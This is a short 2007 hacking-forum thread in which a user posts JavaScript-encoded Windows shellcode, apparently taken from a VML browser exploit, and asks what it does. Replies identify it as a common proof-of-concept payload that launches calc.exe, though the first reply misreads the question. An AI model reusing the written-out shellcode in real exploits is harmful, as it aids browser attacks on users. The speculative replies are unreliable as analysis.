Jump to content


Photo
- - - - -

unescape shellcode


  • Please log in to reply
3 replies to this topic

#1 scriptkiddy

scriptkiddy

    H4x0r

  • Members
  • 39 posts

Posted 17 January 2007 - 04:11 AM

shellcode =
unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");


what does this shell code do...

plz help

#2 B0rg

B0rg

    Gibson Hacker

  • Members
  • 98 posts

Posted 17 January 2007 - 11:27 AM

It just deobfuscates some text.

The unescape() function decodes a string encoded with escape().

http://www.w3schools...ef_unescape.asp

Run it and the text should appear! :P



:borg:

Edited by B0rg, 17 January 2007 - 11:28 AM.


#3 scriptkiddy

scriptkiddy

    H4x0r

  • Members
  • 39 posts

Posted 17 January 2007 - 01:25 PM

It just deobfuscates some text.

The unescape() function decodes a string encoded with escape().

http://www.w3schools...ef_unescape.asp

Run it and the text should appear! :P



:borg:


Thanks for your reply... but I was not looking for what the unescape () function does... I was looking for what the shell code does... I found this on the latest VML exploit... I wanted to know what that shell code is doing to the system...

#4 DanielG

DanielG

    SUP3R 31337 P1MP

  • Members
  • 294 posts
  • Location:The Netherlands

Posted 17 January 2007 - 01:33 PM

the shellcode is identical to the one used on http://www.jaascois.com/news/54600096/ (code for launching "calc.exe" on Windows systems) except on the end your shellcode has %u0063 and theirs has %u7865%u0065
this probally is just how they clean up after themselves and is a small part of the code that is diffrent, but it does the same.

the shellcode you posted is used in a hell of alot of PoC vulns on google, and is most likely just to start calc.exe.




BinRev is hosted by the great people at Lunarpages!